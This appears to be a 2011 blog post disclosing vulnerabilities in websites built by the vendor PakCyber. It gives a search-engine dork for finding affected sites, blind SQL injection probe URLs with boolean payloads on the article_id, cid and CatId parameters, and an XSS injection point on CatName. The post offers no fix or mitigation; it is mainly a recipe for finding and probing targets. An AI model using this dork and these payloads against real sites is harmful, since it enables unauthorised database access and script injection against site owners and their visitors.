PakCyber Web Design Multiple Vulnerabilities ~ Random stuff by yappare

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities

on April 30, 2011 No comments

Title : PakCyber Web Design Multiple Vulnerabilities
Found : by p0pc0rn
Vendor: http://pakcyber.com/
Dork : intext:"Powered By PakCyber"

Blind SQL Injection
-------------------

http://www.victim.com/site.php?article_id=[Blindey]
Eg:
http://www.victim.com/full_article_text.php?article_id=808 and 1=1 TRUE
http://www.victim.com/full_article_text.php?article_id=808 and 1=2 FALSE

http://www.victim2.com/site.php?cid=[Blindey]
Eg:
http://www.victim2.com/university.php?cid=8 or 1=1-- TRUE
http://www.victim2.com/university.php?cid=8 or 1=2-- FALSE

http://www.victim3.com/site.php?CatId=[Blindey]
Eg:
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=1-- TRUE
http://www.victim3.com/CategoryDetails.php?CatId=44 or 1=2-- FALSE

There are more parameters need to be checked out.High possibility there's a SQL Injection vulnerablity too

Cross Site Scripting
--------------------
http://www.victim.com/CategoryDetails.php?CatId=44&CatName=[XSS]

thanks,
#p0pc0rn#

Random stuff by yappare

Saturday, April 30, 2011

PakCyber Web Design Multiple Vulnerabilities

0 comments:

Text Widget

Popular Posts

Pages

Blog Archive

Recent Posts

Unordered List

Categories